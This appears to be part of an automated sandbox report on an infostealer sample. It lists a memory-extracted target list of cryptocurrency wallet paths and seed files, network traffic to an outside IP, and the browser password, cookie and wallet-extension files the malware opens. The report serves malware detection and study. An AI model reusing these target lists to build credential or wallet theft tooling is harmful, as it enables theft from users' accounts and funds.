                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ZJCZETOOers\user\AppData\Roaming\Binance\simple-storage.json
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Leaks process information
                              Source: global trafficTCP traffic: 192.168.2.4:49774 -> 176.53.146.212:80
                              Tries to harvest and steal Bitcoin Wallet information
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
